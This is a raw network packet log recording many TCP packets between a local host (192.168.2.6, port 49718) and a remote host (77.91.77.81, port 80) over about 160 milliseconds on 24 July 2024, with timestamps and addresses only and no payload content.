                                                                                        Jul 24, 2024 07:14:27.340246916 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.340286016 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.340472937 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.340508938 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.340523958 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.340524912 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.340540886 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.340552092 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.340558052 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.340572119 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.340583086 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.340595007 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.341234922 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.341289043 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.341304064 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.341320038 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.341362953 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.341461897 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.341476917 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.341500044 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.341517925 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.341658115 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.341672897 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.341687918 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.341696978 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.341703892 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.341711044 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.341720104 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.341727972 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.341742992 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.341757059 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.342010975 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.342052937 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.342225075 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.342238903 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.342256069 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.342262030 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.342272043 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.342277050 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.342288017 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.342292070 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.342303038 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.342307091 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.342319965 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.342322111 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.342335939 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.342338085 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.342350960 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.342353106 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.342369080 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.342391014 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.342410088 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.342417002 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.342982054 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.343009949 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.343034029 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.343050957 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.343050957 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.343065023 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.343066931 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.343075991 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.343082905 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.343089104 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.343099117 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.343106031 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.343118906 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.343137026 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.406188965 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.406243086 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.406259060 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.406260967 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.406291008 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.406301022 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.406459093 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.406474113 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.406491041 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.406500101 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.406507015 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.406519890 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.406523943 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.406533003 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.406558037 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.406579018 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.406742096 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.406781912 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.406893969 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.406910896 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.406927109 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.406930923 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.406943083 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.406948090 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.406959057 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.406965971 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.406975985 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.406984091 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.406991959 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.406999111 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.407008886 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.407016993 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.407023907 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.407032013 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.407047987 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.407067060 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.407607079 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.407622099 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.407635927 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.407663107 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.407680035 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.407785892 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.407825947 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.407849073 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.407865047 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.407905102 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.408044100 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.408060074 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.408077002 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.408091068 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.408092976 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.408112049 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.408119917 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.408143044 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.408334970 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.408350945 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.408406019 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.408436060 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.408452988 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.408468008 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.408503056 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.408519030 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.408535004 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.408551931 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.408554077 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.408554077 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.408554077 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.408554077 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.408576012 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.408592939 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.409164906 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.409181118 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.409197092 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.409213066 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.409229040 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.409244061 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.409260035 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.409275055 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.409291029 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.409305096 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.409320116 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.409455061 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.415971041 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.416044950 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.416073084 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.416089058 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.416127920 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.416330099 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.416352034 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.416368008 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.416378021 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.416383982 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.416409016 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.416435957 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.436295986 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.436337948 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.436347008 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.436355114 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.436391115 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.436543941 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.436559916 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.436575890 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.436585903 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.436592102 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.436598063 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.436611891 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.436626911 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.436912060 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.436928034 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.436943054 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.436955929 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.436958075 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.436969042 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.436974049 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.436990976 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.436996937 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.437007904 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.437012911 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.437027931 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.437036991 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.437043905 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.437076092 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.437104940 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.437747955 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.437762976 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.437777996 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.437793970 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.437796116 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.437809944 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.437809944 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.437825918 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.437825918 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.437843084 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.437854052 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.437865019 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.437876940 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.437880993 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.437896013 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.437897921 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.437907934 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.437915087 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.437923908 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.437931061 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.437939882 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.437956095 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.437969923 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.438661098 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.438678980 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.438694000 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.438709021 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.438719988 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.438724041 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.438740015 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.438741922 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.438755989 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.438776970 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.438779116 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.438779116 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.438791990 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.438806057 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.438812971 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.438822031 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.438827038 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.438837051 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.438846111 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.438869953 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.439740896 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.439758062 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.439774036 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.439779043 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.439790964 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.439791918 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.439806938 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.439809084 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.439827919 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.439836025 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.439842939 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.439858913 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.439862013 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.439873934 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.439884901 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.439889908 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.439907074 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.439908981 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.439923048 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.439930916 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.439958096 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.444155931 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.444170952 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.444200039 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.444221973 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.490089893 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.490113020 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.490129948 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.490154982 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.490190983 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.490370035 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.490386009 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.490401983 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.490416050 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.490417957 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.490447044 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.490475893 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.491023064 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.491039991 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.491055965 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.491071939 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.491086960 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.491086960 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.491132021 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.491883993 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.491900921 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.491916895 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.491924047 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.491934061 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.491939068 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.491950035 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.491955996 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.491969109 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.491971016 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.491988897 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.492006063 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.492759943 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.492777109 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.492793083 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.492798090 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.492811918 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.492831945 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.496865988 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.496917009 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.496959925 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.496977091 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.497021914 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.497102976 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.497118950 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.497133017 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.497147083 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.497148037 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.497170925 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.497198105 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.497608900 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.497623920 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.497638941 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.497653961 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.497663021 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.497689009 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.497710943 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.498131990 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.498146057 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.498162031 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.498174906 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.498177052 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.498184919 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.498192072 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.498202085 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.498207092 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.498220921 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:27.498222113 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:27.498231888 CEST4971880192.168.2.677.91.77.81
